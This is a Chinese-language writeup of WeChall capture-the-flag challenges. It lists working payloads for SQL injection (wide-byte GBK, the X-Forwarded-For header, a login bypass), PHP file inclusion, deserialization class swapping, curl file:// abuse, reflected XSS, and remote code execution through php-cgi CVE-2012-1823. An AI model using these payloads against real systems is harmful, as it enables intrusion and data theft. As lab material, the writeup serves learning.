Assassin__is__me
Assassin__is__me

Wechall writeup By Assassin

不得不说wechall的题目还是挺有趣的,外国的题目感觉和国内的题目不太一样,真是学习学习了,wp持续跟新

Prime Factory 

#_*_ coding:utf-8 _*_
import math
def is_prime(num):
    for i in range(2,int(math.sqrt(num))+1):
        if num%i==0:
            return False
    return True 

def get_total(num):
    total=0
    while num:
        total+=num%10
        num/=10
    return total


flag=0
number1=0
number2=0
for i in range(1000000,10000000):
    if is_prime(i) and is_prime(get_total(i)):
        if flag==0:
            number1=i
            flag=1
        elif flag==1:
            number2=i
            break
print number1,number2
print str(number1)+str(number2)

Training: Get Sourced

Wechall writeup By Assassin_第1张图片

Training: ASCII

#_*_ coding:utf-8 _*_
s=[84, 104, 101, 32, 115, 111, 108, 117, 116, 105, 111, 110, 32, 105, 115, 58, 32, 101, 114, 103, 102, 105, 105, 105, 102, 115, 100, 104, 103]
flag=''
for i in s:
    flag+=chr(i)
print flag

Encodings: URL

#_*_ coding:utf-8 _*_
import urllib
url='%59%69%70%70%65%68%21%20%59%6F%75%72%20%55%52%4C%20%69%73%20%63%68%61%6C%6C%65%6E%67%65%2F%74%72%61%69%6E%69%6E%67%2F%65%6E%63%6F%64%69%6E%67%73%2F%75%72%6C%2F%73%61%77%5F%6C%6F%74%69%6F%6E%2E%70%68%70%3F%70%3D%73%68%67%73%61%6D%6F%67%6D%73%6C%72%26%63%69%64%3D%35%32%23%70%61%73%73%77%6F%72%64%3D%66%69%62%72%65%5F%6F%70%74%69%63%73%20%56%65%72%79%20%77%65%6C%6C%20%64%6F%6E%65%21'
print urllib.unquote(url)

Training: Stegano I

Wechall writeup By Assassin_第2张图片

Training: WWW-Robots

http://www.wechall.net/robots.txt

Wechall writeup By Assassin_第3张图片 

http://www.wechall.net//challenge/training/www/robots/T0PS3CR3T

Training: Crypto - Caesar I 

#_*_ coding:utf-8 _*_
import urllib
sss='NBY KOCWE VLIQH ZIR DOGJM IPYL NBY FUTS XIA IZ WUYMUL UHX SIOL OHCKOY MIFONCIH CM GBAHLZLGUFCX'
for i in range(26):
    flag=''
    for j in sss:
        if j !=' ':
            flag+=chr((ord(j)-ord('A')+i)%26+ord('A'))
        else :
            flag+=' '
    print flag

Wechall writeup By Assassin_第4张图片

PHP 0817


if (isset($_GET['which']))
{
        $which = $_GET['which'];
        switch ($which)
        {
        case 0:
        case 1:
        case 2:
                require_once $which.'.php';
                break;
        default:
                echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);
                break;
        }
}
?>
http://www.wechall.net/challenge/php0817/index.php?which=solution

这不算文件包含吧…

Training: WWW-Basics

需要服务器,暂时没做

Training: MySQL I

万能密码

username=admin' or '1'='1

Training: PHP LFI 

$filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';
include $filename;

很有趣的题目,首先是发现两个网址的不同

http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=welcome

http://www.wechall.net/challenge/training/php/lfi/solution.php

比较容易发现solution.php在当前目录下的上两级目录,即是../../,然后是文件包含,用%00 截断多余的.html ,而且想让eval第二次成立还必须存在如下路径

function lfiIsSafeDir($filename)
{
    $valid = array(
        'pages',
        'pages/../..',
        'pages/..',
    );
    $d = dirname($filename);
    return in_array($d, $valid, true);
}

这就更加明显了,最终payload

http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

Training: Register Globals

看原来的代码部分,Register Globals可以造成代码的覆盖,GET、POST、cookie均可能。这里在源代码注意到


# EMULATE REGISTER GLOBALS = OFF
foreach ($_GET as $k => $v) { unset($$k); }

模仿变量覆盖来着,但是只是支持GET,和真正的Register Globals还不一样,一开始看叉了…
最终payload

http://www.wechall.net/challenge/training/php/globals/globals.php?login[0]=admin

PHP 0818

关键代码如下

function noother_says_correct($number)
{
    $one = ord('1');
    $nine = ord('9');
    # Check all the input characters!
    for ($i = 0; $i < strlen($number); $i++)
    { 
        # Disallow all the digits!
        $digit = ord($number{$i});
        if ( ($digit >= $one) && ($digit <= $nine) )
        {
            # Aha, digit not allowed!
            return false;
        }
    }

    # Allow the magic number ...
    return $number == "3735929054";
}

明显过滤了1-9,但是没有过滤0,构造16进制绕过即可
paylaod

0xdeadc0de

Are you serial

题目也没有明确的说要干啥,蛋疼了好一段时间。找了半天没找到关键点,而且这个看着不怎么连续啊,看了看大师傅门的博客才知道想干嘛…
首先看到insecure.inc.php中的代码

/**
 * Ultra Safe Auto Include
 * @author Z
 * @param string $classname
 */
function my_autoloader($classname)
{
        chdir('challenge/are_you_serial');
        require_once './'.str_replace('.', '', $classname).'.php';
        chdir('../../');
}

/**
 * Registers auto include
 */
spl_autoload_register('my_autoloader');
?>

关键在于spl_autoload_register这个函数,这个函数是自动注册类用的,在当今特别是新型的框架(laravel、composer)中常用。
我们看到抓包得到的cookie很有特点

O:11:"SERIAL_User":3:{s:8:"username";s:3:"asd";s:8:"password";s:8:"testtest";s:9:"userlevel";i:0;}

原因是在post login之后调用了函数

...
if (isset($_POST['login']))
{
        $form->execute(Common::getPostString('username'));
}
...


final class SERIAL_LoginForm
{
        public function serial_formz()
        {
                $data = array();
                $data['username'] = array(GWF_Form::STRING, '', 'Username');
                $data['login'] = array(GWF_Form::SUBMIT, 'Login');
                return new GWF_Form($this, $data);
        }

        public function execute($username)
        {
                $password = 'testtest'; #random

                $user = new SERIAL_User($username, $password);

                $serial = serialize($user);

                $_COOKIE['serial_user'] = $serial;

                setcookie('serial_user', $serial, time()+31536000, GWF_WEB_ROOT_NO_LANG, GWF_DOMAIN, false, true);
        }
}

我们看到调用了SERIAL_User这个类。
我们继续code.php向下看存在一个反序列化!

if (false !== ($user = unserialize(Common::getCookie('serial_user', ''))))
{
        # Show welcome screen
        echo GWF_HTML::message('Serial Challenger', $chall->lang('msg_wb', array(htmlspecialchars($user->getUsername()), $user->getPassword(), $user->getUserlevel())));

        # Show logout form
        echo $form_logout->serial_formz()->templateY($chall->lang('ft_logout'));
}
# Guest
else
{
        # Show login form
        echo $form->serial_formz()->templateY($chall->lang('ft_login'));
}

而我们之前说的spl_autoload_register函数,如果解析后是一个别的类,就会调用到别的类,我们需要调用的是SERIAL_Solution.php,猜测是cookie传参,我们将原来序列化的值稍作修改,名字改为SERIAL_Solution(长度随着改变)

O:15:"SERIAL_Solution":3:{s:8:"username";s:6:"serial";s:8:"password";s:8:"testtest";s:9:"userlevel";i:0;}

但是如果传参有login就会对cookie进行重新设置,我们需要去掉login传参即可!
修改如下

Wechall writeup By Assassin_第5张图片

特别的是,如果有spl_autoload_register函数+文件上传可以getshell,这里放个连接

https://www.leavesongs.com/penetration/some-sangebaimao-ctf-writeups.html#0x02-getshell_1

htmlspecialchars

貌似是一个XSS题目,猛一看就是看到了存在htmlspecialchars函数转义,但是通过查找资料,该函数只是转义如下字符

&(和号) 成为&
" (双引号) 成为 "
' (单引号) 成为 '
< (小于) 成为 &lt;
> (大于) 成为 >

而且在默认的情况下有如此的设定

Wechall writeup By Assassin_第6张图片

所以在默认的条件下就是不会转义单引号!
本地搭建环境如下 


if(isset($_GET['in']))
{
    $a=$_GET['in'];
    echo "Exploit Me";
    echo "
";
    echo htmlspecialchars("Exploit Me");
}
?>

给一个XSS不错的总结地址,轻松找到a标签的xss方式

http://blog.csdn.net/keepxp/article/details/52054388

Wechall writeup By Assassin_第7张图片

然后这就是我们的exploit了,要修复并不难,加上参数ENT_QUOTES即可,最终solution如下

echo "),ENT_QUOTES)."'>Exploit Me";

PHP 0816

之前真是被PHP搞的过于紧张了,一直心想这这是什么函数有毛病?最后搞了半天发现这是程序流程的问题!首先我们看一下code.php前面的代码

foreach ($_GET as $key => $value)
{
        if ($key === 'src') {
                php0816SetSourceFile($value);
        }
        elseif ($key === 'mode') {
                php0816execute($value);
        }
        elseif ($key === 'hl') {
                php0816addHighlights($value);
        }
}

顾名思义就是依次接收GET的·数值,当接收到src变量的时候,设置要读取的文件名(其中有白名单限制)、当读到hl时选中需要加上标签的单词,mode变量(值必须时hl)对读取内容进行翻译。这是for循环,所以有顺序之分

我们看到在src调用的函数中设置了白名单,很难绕过

function php0816SetSourceFile($filename)
{
    $filename = (string) $filename;

    static $whitelist = array(
        'test.php',
        'index.php',
        'code.php',
    );

    # Sanitize by whitelist
    if (!in_array($filename, $whitelist, true))
    {
        $_GET['src'] = false;
    }
}

但是加入我们调换了参数的顺序,可以调换函数的调用顺序,造成先读取文件再过滤函数!最终我们只需要换一下顺序即可!
payload如下:

http://www.wechall.net/challenge/php0816/code.php
?hl[0]=function
&mode=hl
&src=solution.php

Wechall writeup By Assassin_第8张图片 

is 'AnotherCodeflowMistake';
?>
NOTHING MORE?
END OF FILE!

Crappyshare

这题确实不是我自己做的,学习一波,说是一个文件包含的问题,分为文件上传和url上传,这个就很尴尬,文件上传找了半天没有看到什么方法,相反脆弱点再代码审计的地方,关键代码如下

function upload_please_by_url($url)
{
        if (1 === preg_match('#^[a-z]{3,5}://#', $url)) # Is URL?
        {
                $ch = curl_init($url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
                curl_setopt($ch, CURLOPT_FAILONERROR, true);
                if (false === ($file_data = curl_exec($ch)))
                {
                        htmlDisplayError('cURL failed.');
                }
                else
                {
                        // Thanks
                        upload_please_thx($file_data);
                }
        }
        else
        {
                htmlDisplayError('Your URL looks errorneous.');
        }
}

我们可以看到php调用了curl,对于url变量只是进行了简单的过滤,验证你是不是网址,file:理所应当地绕过了,这里通过curl重定向到了本地磁盘!!!从而达到绕过的目的!所以构造payload如下即可
在框中填入

file://solution.php

Wechall writeup By Assassin_第9张图片

PHP 0815

首先要明白注入点在哪很容易就是in_array()函数同is_numic()函数一样,再弱类型匹配时候’1’==’1asd’,尤其时in_array()匹配不严格的时候存在问题,这样注入没毛病

Wechall writeup By Assassin_第10张图片

想要改进in_array要严格匹配,加上第三个参数true构造 

in_array($show, $whitelist,true)

但是返回别的东西…

Wechall writeup By Assassin_第11张图片

简直是逗逼,然后我想到了修改一下它的类型,我想这是把1,2,3修改字符串,本地也是可以的,但是它就是不行,提交strval() 未果,爆炸,但是输入了intval()就可以???改哪个不是改…什么狗屁…但是显示我得payload太长了

Wechall writeup By Assassin_第12张图片

既然是强制转换成int型尝试强制转换呢?int(),结果出了这个

Wechall writeup By Assassin_第13张图片

最短的黑魔法…

最短的黑魔法…. –> $show - 0

字符串-0…变成了int…

Wechall writeup By Assassin_第14张图片

No Escape

首先接收到源码


//
// Trigger Moved to index.php
//if (false !== ($who = Common::getGet('vote_for'))) {
//  noesc_voteup($who);
//}
//
/**
 * Get the database link
 * @return GDO_Database
 */
function noesc_db()
{
    static $noescdb = true;
    if ($noescdb === true)
    {
        $noescdb = gdo_db_instance('localhost', NO_ESCAPE_USER, NO_ESCAPE_PW, NO_ESCAPE_DB);
        $noescdb->setLogging(false);
        $noescdb->setEMailOnError(false);
    }
    return $noescdb;
}

/**
 * Create table (called by install-script)
 * The table layout is crappy, there is only 1 row in the table Oo.
 * @return boolean
 */
function noesc_createTable()
{
    $db = noesc_db();
    $query =
        "CREATE TABLE IF NOT EXISTS noescvotes ( ".
        "id     INT(11) UNSIGNED PRIMARY KEY, ". # I could have one row per candidate, but currently there is only one global row(id:1). I know it`s a bit unrealistic, but at least it is safe, isn`t it?
        "bill   INT(11) UNSIGNED NOT NULL DEFAULT 0, ". # bill column
        "barack INT(11) UNSIGNED NOT NULL DEFAULT 0, ". # barack column
        "george INT(11) UNSIGNED NOT NULL DEFAULT 0 )"; # george columb

    if (false === $db->queryWrite($query)) {
        return false;
    }
    return noesc_resetVotes();
}

/**
 * Reset the votes.
 * @return void
 */
function noesc_resetVotes()
{
    noesc_db()->queryWrite("REPLACE INTO noescvotes VALUES (1, 0, 0, 0)");
    echo GWF_HTML::message('No Escape', 'All votes have been reset', false);
}

/**
 * Count a vote.
 * Reset votes when we hit 100 or 111.
 * TODO: Implement multi language
 * @param string $who
 * @return void
 */
function noesc_voteup($who)
{
    if ( (stripos($who, 'id') !== false) || (strpos($who, '/') !== false) ) {
        echo GWF_HTML::error('No Escape', 'Please do not mess with the id. It would break the challenge for others', false);
        return;
    }


    $db = noesc_db();
    $who = mysql_real_escape_string($who);
    $query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";
    if (false !== $db->queryWrite($query)) {
        echo GWF_HTML::message('No Escape', 'Vote counted for '.GWF_HTML::display($who), false);
    }

    noesc_stop100();
}

/**
 * Get all votes.
 * @return array
 */
function noesc_getVotes()
{
    return noesc_db()->queryFirst("SELECT * FROM noescvotes WHERE id=1");
}

/**
 * Reset when we hit 100. Or call challenge solved on 111.
 * @return void
 */
function noesc_stop100()
{
    $votes = noesc_getVotes();
    foreach ($votes as $who => $count)
    {
        if ($count == 111) {
            noesc_solved();
            noesc_resetVotes();
            break;
        }

        if ($count >= 100) {
            noesc_resetVotes();
            break;
        }
    }
}

/**
 * Display fancy votes table.
 * New: it is multi language now.
 * @return unknown_type
 */
function noesc_displayVotes(WC_Challenge $chall)
{
    $votes = noesc_getVotes();
    echo '';
    echo sprintf('', $chall->lang('th_name'), $chall->lang('th_count'), $chall->lang('th_vote'));
    $maxwho = '';
    $max = 0;
    $maxcount = 0;
    // Print Candidate rowsforeach ($votesas$who => $count)
    {
        if ($who !== 'id') // Skip ID
        {
            $count = (int) $count;
            if ($count > $max) {
                $max = $count;
                $maxwho = $who;
                $maxcount = 1;
            }
            elseif ($count === $max) {
                $maxcount++;
            }
            $button = GWF_Button::generic($chall->lang('btn_vote', array($who)), "index.php?vote_for=$who");
            echo sprintf('', $who, $count, $button);
        }
    } 
    echo'
%s%s%s!

      
%s%s%s
 
';

    // Print best candidate.    
    if ($maxcount === 1) {
        echo GWF_Box::box($chall->lang('info_best', array(htmlspecialchars($maxwho))));
    }
}

/**
 * Try to get here :)
 */
function noesc_solved()
{
    if (false === ($chall = WC_Challenge::getByTitle('No Escape'))) {
        $chall = WC_Challenge::dummyChallenge('No Escape', 2, '/challenge/no_escape/index.php', false);
    }
    $chall->onChallengeSolved(GWF_Session::getUserID());
}

?>

我们关键查看可控的输入点,然后查询后发现关键的sql语句如下

$query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";

单纯的构造闭合是很难的,所以我们准备利用第一个空然后利用mysql注释符绕过(注释符包括# ,– ,/**/注意–后面还有空格!)然后构造

http://www.wechall.net/challenge/no_escape/index.php?vote_for=bill`=111 ;%23

http://www.wechall.net/challenge/no_escape/index.php?vote_for=bill`=111 ;--%20

注意特殊符号要urlencode!如#

Yourself PHP


require 'checkit.php'; # required to check your solution/injection

chdir('../../'); # chroot to web root
define('GWF_PAGE_TITLE', 'Yourself PHP'); # Wrapper hack
require_once('challenge/html_head.php'); # output start of website

# Get the challenge
if (false === ($chall = WC_Challenge::getByTitle('Yourself PHP'))) {
        $chall = WC_Challenge::dummyChallenge('Yourself PHP', 4, 'challenge/yourself_php/index.php', false);
}
# And display the header
$chall->showHeader();

# Show mission box (translated)
echo GWF_Box::box($chall->lang('mission_i', array('index.php?highlight=christmas')), $chall->lang('mission_t'));

# Check your injection and fix the hole by silently applying htmlsepcialchars to the vuln input.
if (phpself_checkit())
{
        $chall->onChallengeSolved(GWF_Session::getUserID());
}

# Show this file as highlighted sourcecode, if desired
if ('christmas' === Common::getGetString('highlight'))
{
        $msg = file_get_contents('challenge/yourself_php/index.php');
        $msg = '['.'code=php title=index.php]'.$msg.'['.'/code]';
        echo GWF_Box::box(GWF_Message::display($msg));
}



# __This is the challenge:
if (isset($_POST['username']))
{
        echo GWF_Box::box(sprintf("Well done %s, you entered your username. But this is not what you need to do.", htmlspecialchars(Common::getPostString('username'))));
}
echo '
'.PHP_EOL;
echo sprintf('
', $_SERVER['PHP_SELF']).PHP_EOL;
echo sprintf('
%s
', GWF_CSRF::hiddenForm('phpself')).PHP_EOL;
echo sprintf('
Username:
').PHP_EOL;
echo sprintf('
').PHP_EOL;
echo sprintf(''
).PHP_EOL;
echo '
'.PHP_EOL;
# __End of challenge



# Print Challenge Footer
echo $chall->copyrightFooter();
# Print end of website
require_once('challenge/html_foot.php');
?>

说是xss但是输入点确不是username,这里关键的点在echo sprintf('

', $_SERVER['PHP_SELF']).PHP_EOL;
这个$_SERVER['PHP_SELF'],百度一下就发现资料

http://www.5idev.com/p-php_server_php_self.shtml

实验


echo '$_SERVER['PHP_SELF'].'" method="post">'.PHP_EOL;
?>

Wechall writeup By Assassin_第15张图片

构造 localhost:8080/flag.php/%22>
Wechall writeup By Assassin_第16张图片
但是不知道为什么不通过…不就是闭合了后面嘛…
结果是… 

http://www.wechall.net/challenge/yourself_php/index.php/%22>form><script>alert(1);script>

mdzz

Stop us

这个题目真是又一次颠覆了我对php的认识,真是一门神奇的语言(坏点说就是洞千奇百怪)确实没有接触过类似的东西,这个思路是参考大牛的。

Wechall writeup By Assassin_第17张图片

注意到这个ignore_user_abort,上网查一下

Wechall writeup By Assassin_第18张图片

简单的说,就是当ignore_user_abort是false的时候,当客户机断开的时候脚本中止,php的客户端并不能检测用户是否断开了,只能通过flush()向用户发出更新缓存来判断用户是否连接。
我们看代码首先可以清楚的看到ignore_user_abort=false不必多说,然后可以发现在申请得到域名的时候是先申请域名,然后才计费的!在这中间它调用了 nooth_message函数!然后我们看看该函数源码 

function nooth_message($message, $sleep=2)
{
    echo sprintf('
%s
', $message).PHP_EOL;
    flush();
    sleep($sleep);
}

发现了源码!!!说明这个程序可以通过检测用户下限被终止!
而且有趣的是这样

Complicating things is even if you do issue periodic calls to flush(), having output buffering on will cause those calls to trap and won’t send them down to the client until the script completes anyway!

所以我们注意到代码的开头有这么一句!

Wechall writeup By Assassin_第19张图片

然后我们具体需要操作的就是,先充一次值(为了通过检测你有木有钱),直接购买,并且在扣费之前退出即可!

真是神奇了!学习学习!

PHP 0819

猛一看代码并不是很多啊


// closure, because of namespace!
$challenge = function()
{
        $f = Common::getGetString('eval');
        $f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);

        if((strlen($f) > 13) || (false !== stripos($f, 'return')))
        {
                die('sorry, not allowed!');
        }

        try
        {
                eval("\$spaceone = $f");
        }
        catch (Exception $e)
        {
                return false;
        }

        return ($spaceone === '1337');
};
?>

目的也十分明显,第一是eval开始过滤了大量的特殊符号,然后在后面的eval语句中需要将变量spaceone赋值为1337,因为eval的特性,需要在后面加上; 否则将会报错,即需要利用'1337';。而我们可以利用的字符最长为13字节!一开始理解错了题意,以为是getshell一类的,现在看来只是单纯的绕过这个函数,因为return ($spaceone === '1337');是强类型比较,而过滤了单引号,不知道怎么做

通过查询输入字符串的表达方式发现存在三种,详细见如下
http://php.net/manual/zh/language.types.string.php
可以用heredoc构造绕过单引号!!!新姿势(为啥最近自己总是想不出来东西,气人…)
注意heredoc的格式!

<<

内容中不能包括特殊符号,以一个变量起始,以相同的变量名+逗号结束(还要再加上一个换行符!)
构造poc如下即可!

?eval=<<<s%0a1337%0as;%0a

The Guestbook

本题目看过源码之后,发现IP貌似是可控的嗯,然后发现我们目标在一个table中,而我们发表文章在另一个table中,并且结合回显猜想构成代码注入插入查询的密码!
在本地实验一下,有一个test表如下

mysql> select user from test;
+-------+
| user  |
+-------+
| admin |
| guest |
+-------+

然后我们使用另一个表flag,总共三列,插入语句如下!

insert into flag values('1',(select user from test limit 0,1),'flag{flag_is_here}');

然后查看效果!

mysql> select * from flag;
+------+-------+--------------------+
| id   | info  | flag               |
+------+-------+--------------------+
| 1    | admin | flag{flag_is_here} |
+------+-------+--------------------+
1 row in set (0.00 sec)

估计就是这个方法了,动手!先是burp抓包一下,然后加入X_FORWARDED_FOR选项,然后在该项加上如下payload

X_FORWARDED_FOR:',(select gbu_password from gbook_user limit 0,1))#

即可!!!

TheBrownFoxAndTheLazyDog

HOST me

猛一看是所谓的HTTP_HEADER头污染什么的,但是没那么简单,查一下资料发现
Apache则是看所有请求的host,Nginx则只是看最后一个请求的host。有时你可能通过下面这个请求来欺骗Varnish达到污染的目的
经过测试未果

Wechall writeup By Assassin_第20张图片

发现他说的 

    Fun Fact: There is even a virtualhost named localhost, which probably does not make it easier.
    It seems like we need to reinstall the box, unless you can access this page with the correct constraints.

它的内网中还存在一台虚拟机名字叫做localhost…这…
以下又不是我想的方法…
为了避免之前的冲突,我们注意到原来的host是www.wechall.net,当下存在虚拟机localhost的话是会访问虚拟机的,解决方法是,在修改host为localhost的前提下,将GET地址修改成绝对地址即可

如下

Wechall writeup By Assassin_第21张图片

进一步追究到底是个什么原理,发现是这个

RFC 2616 Section 5.1.2 Request-URI

To allow for transition to absoluteURIs in all requests in future
versions of HTTP, all HTTP/1.1 servers MUST accept the absoluteURI
form in requests, even though HTTP/1.1 clients will only generate
them in requests to proxies.

还见到各种姿势,比如用curl的

curl -i -H "Host: localhost" --proxy1.0 www.wechall.net:80 -b "WC=..." http://www.wechall.net/challenge/space/host_me/index.php

用nc的

echo -e "GET http://wechall.net/challenge/space/host_me/index.php HTTP/1.0\r\nHost: localhost\r\nCookie: WC=xxxx\r\n\r\n" | nc wechall.net 80

真是又涨了一波姿势嗯!

Warchall: Live RCE

这个题目也非常有意思搜索php rce(这里说一下rce就是Remote Code Execution即远程代码执行)发现PHP-CGI Source Disclosure,也是一个CVE漏洞
CVE-2012-1823
然后搜索一下如何利用,发现长亭科技的文章,写的还是非常好的
https://paper.seebug.org/297/
然后我们直接利用文章中的poc
构造远程文件包含构造RCE,构造如下

http://rce.warchall.net/?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input

POST:php phpinfo();?>

Wechall writeup By Assassin_第22张图片

然后就是任我行了,其实就没什么意思了,发现答案在../config.php文件中,随便读一下即可 

StrongGard_6_3

Addslashes

一个比较简单的题目,首先是发现源码


function asvsmysql_login($username, $password)
{
    $username = addslashes($username);
    $password = md5($password);

    if (false === ($db = gdo_db_instance('localhost', ADDSLASH_USERNAME, ADDSLASH_PASSWORD, ADDSLASH_DATABASE, GWF_DB_TYPE, 'GBK'))) {
        return htmlDisplayError('Can`t connect to database.');
    }

    $db->setLogging(false);
    $db->setEMailOnError(false);

    $query = "SELECT username FROM users WHERE username='$username' AND password='$password'";

    if (false === ($result = $db->queryFirst($query))) {
        return htmlDisplayError('Wrong username/password.');
    }

    if ($result['username'] !== 'Admin') {
        return htmlDisplayError('You are logged in, but not as Admin.');
    }

    return htmlDisplayMessage('You are logged in. congrats!');
}
?>

然后我们发现关键就在

$username = addslashes($username);
$password = md5($password);

知道password不好利用,那么如何利用username,利用方法就是宽字节注入,但是关键的一点还需要让我们查询的username==Admin,这个我们猜想一定数据库是存在的,一步步来首先构造宽字节注入

http://www.wechall.net/challenge/addslashes/index.php?username=%bf%27+or+1+%23
&password=admin
&login=%E6%B3%A8%E5%86%8C

Wechall writeup By Assassin_第23张图片

然后怎么办?我们用union select 再查一次!为了避开括号的引用我们继续查users中username,只要用limit去控制即可!
最终payload 

http://www.wechall.net/challenge/addslashes/index.php?username=Admin%bf%27+union+select+username+from+users+limit+1,1%23
&password=admmiin
&login=%E6%B3%A8%E5%86%8C
























你可能感兴趣的:(Web)

  • k8s service管理之WEB管理工具Dashboard 烤鸡翅^_^我最爱吃 kubernetes容器云原生
    Dashboard1.Dashboard概述-Dashboard是基于网页的Kubernetes用户界面。-Dashboard同时展示了Kubernetes集群中的资源状态信息和所有报错信息。-可以使用Dashboard将应用部署到集群中,也可以对容器应用排错,还能管理集群资源。列如,你可以对应用弹性伸缩、发起滚动升级、重启等等。-Dashboard官网:https://github.com/ku
  • 攻防世界(simple_php、baby_web详解) l2ohvef web
    一、simple_php1.审计代码如果a==0,输出flag1;如果b是数字,退出;如果b>1234,输出flag2;flag=flag1+flag2;只要输入符合条件的值即可获得flag二、baby_web1.题目:想想初始页面是哪个2.打开burp,拦截抓包,查看返回信息,找到flag
  • web安全漏洞之命令注入 rzydal 笔记网络安全web安全安全学习
    命令注入1.什么是命令注入通常情况下,开发者使用一些可以执行命令的函数且未对用户输入进行安全检查时,可以造成命令注入。从CTF的角度来讲,命令注入可以实现:1、直接读取flag2、反弹shell3、利用题目环境漏洞,控制整个题目环境,干扰其他队伍解题在各类编程语言中,都存在直接调用系统命令的函数,比如PHP的system函数,Python的os.system,Java的Runtime.exec都可
  • python调用webrtc实现视频码率控制 音视频开发老马 pythonwebrtc音视频
    要使用Python调用WebRTC实现视频码率控制,你需要了解以下几个步骤:安装WebRTCWebRTC是一个开源的浏览器技术,可用于实现实时通信和视频会议。你可以使用它来实现视频码率控制。要安装WebRTC,你需要从官方网站下载WebRTC代码并进行编译。这可能需要一些时间,取决于你的计算机性能。实现视频流为了使用WebRTC进行视频码率控制,你需要先实现一个视频流。你可以使用OpenCV等工具
  • python实现webrtc通过whep拉取实时音频流 眉梢i webrtc音视频
    需求背景:通过whep的方式从流媒体服务器平台(基于srs服务器改造的平台)拉取实时音频流,数据传递采用48khz、16bit、双声道音频流,接收到数据后,转换成16khz、16bit、单声道音频流,并将其以base64加密字节流方式通过websocket传递给第三方;1:通道及轨道的建立classAudioTrack(MediaStreamTrack):kind="audio"def__init
  • pytthon实现webrtc通过whip推送实时流式音频流 眉梢i webrtc音视频
    需求背景:通过whip的方式推送流式的实时音频流到流媒体服务器平台(基于srs服务器改造的平台)数据传递采用48khz、16bit、双声道音频流,将需要发送的数据,从16khz、16bit、单声道音频流转换成所需传递的格式,并对源音频流进行大小切割,阻塞限速,按照实际播放器的一倍速进行推送;核心代码:1:将音频流转换成可传递的音频帧asyncdefbytes_to_audio_frames(sel
  • Uvicorn:安装、部署与开发详解 醉心编码 人工智能基础编程基础通信软件人工智能WEB
    Uvicorn:安装、部署与开发详解一、Uvicorn简介二、Uvicorn安装三、Uvicorn基本使用四、Uvicorn部署方法1.手动启动服务器2.使用Gunicorn和Uvicorn3.使用Docker容器4.虚拟环境运行五、Uvicorn开发方法1.异步API服务2.使用中间件3.处理WebSocket连接Uvicorn是一个高性能的异步Web服务器框架,专为异步PythonWeb应用设
  • uvicorn,一个无敌的 Python 库! 可口可乐没有乐 python开发语言
    大家好,今天为大家分享一个无敌的Python库-uvicorn。Github地址:https://github.com/encode/uvicornPythonUvicorn是一个快速的ASGI(AsynchronousServerGatewayInterface)服务器,用于构建异步Web服务。它基于asyncio库,支持高性能的异步请求处理,适用于各种类型的Web应用程序。本文将介绍Uvico
  • 探索实时通信新可能:Python中的WebRTC和ORTC库——aiortc 邬情然Harley
    探索实时通信新可能:Python中的WebRTC和ORTC库——aiortc项目地址:https://gitcode.com/gh_mirrors/ai/aiortc项目介绍aiortc是一个专为Python设计的库,旨在实现Web实时通信(WebRTC)和对象实时通信(ORTC)。基于Python的标准异步I/O框架——asyncio,它提供了一种在Python中进行实时音视频传输和数据通道交换
  • Python Uvicorn库:构建高性能的异步Web服务器 程序员喵哥 python前端服务器开发语言运维
    更多Python学习内容:ipengtao.comPythonUvicorn库是一个基于ASGI(AsynchronousServerGatewayInterface)标准的高性能异步Web服务器,它能够处理大量并发请求并提供快速响应。本文将详细介绍Uvicorn库的功能和用法,并通过丰富的示例代码演示其强大之处。安装和基础用法安装Uvicorn库首先,需要安装Uvicorn库。可以通过以下命令进
  • Python实现WebRTC推流直播 WaJulia pythonwebrtc开发语言
    WebRTC(Web实时通信)是一种支持浏览器之间实时音视频通信的开放标准。在本文中,我们将使用Python编程语言实现WebRTC推流直播功能,并提供相应的源代码示例。要实现WebRTC推流直播,我们需要使用以下工具和库:Python:一种流行的编程语言,适用于快速开发网络应用程序。aiortc:一个基于Python的WebRTC库,提供了对WebRTC协议的支持。Opus和VP8:音频和视频编
  • 使用Python实现实时视频传输的WebRTC IdcEditor python音视频webrtcWebRTC
    WebRTC(Web实时通信)是一种开源项目,提供了在Web浏览器之间进行实时音视频通信的能力。在Python中,我们可以使用WebRTC库来实现实时视频传输。为了实现两台计算机之间的实时视频传输,我们需要在两台计算机上分别运行服务器端和客户端代码。下面是一个示例:服务器端代码:importasyncioimportcv2importaiortcfromaiortc.contrib.mediaim
  • python编写webRTC推拉流脚本,推自定义音频文件,获取音频流写入文件 眉梢i pythonwebrtc开发语言
    importasyncioimportaiohttpfromaiortcimportRTCPeerConnection,RTCSessionDescriptionfromaiortc.contrib.mediaimportMediaPlayerasyncdefsend_sdp(e_sdp):url="https://xxxxx:xxxx/rtc/v1/whip/?app=live&stream=l
  • HTML5 通信方式及应用 天涯学馆 大前端&移动端全栈架构html5前端html
    目录postMessageAPIWebSocketsServer-SentEvents(SSE)FetchAPI/XMLHttpRequest(XHR)WebWorkers&ServiceWorkersHTML5提供了多种通信方式,使得浏览器中的Web应用能够实现页面间、窗口间、甚至与外部服务的有效通信。这些通信方式大大提升了Web应用的交互性和复杂性,为构建现代、富客户端Web应用奠定了基础。以
  • HTML5 WebGL技术应用 天涯学馆 大前端&移动端全栈架构前端html5html
    目录WebGL基础知识WebGL库WebGL学习资料大型WebGL应用WebGL基础知识前端开发基础:熟悉HTML、CSS和JavaScript。数学基础:了解向量、矩阵运算、线性代数和基本几何概念。图形学基础:掌握基本的计算机图形学原理,如光照、纹理、变换、投影等。WebGLAPI的基本使用,包括创建画布、着色器、程序、缓冲区等。了解WebGL的渲染过程和管道,包括顶点处理、三角形剪裁、光照、纹
  • HTML5 拖拽API应用 天涯学馆 大前端&移动端全栈架构html5前端html
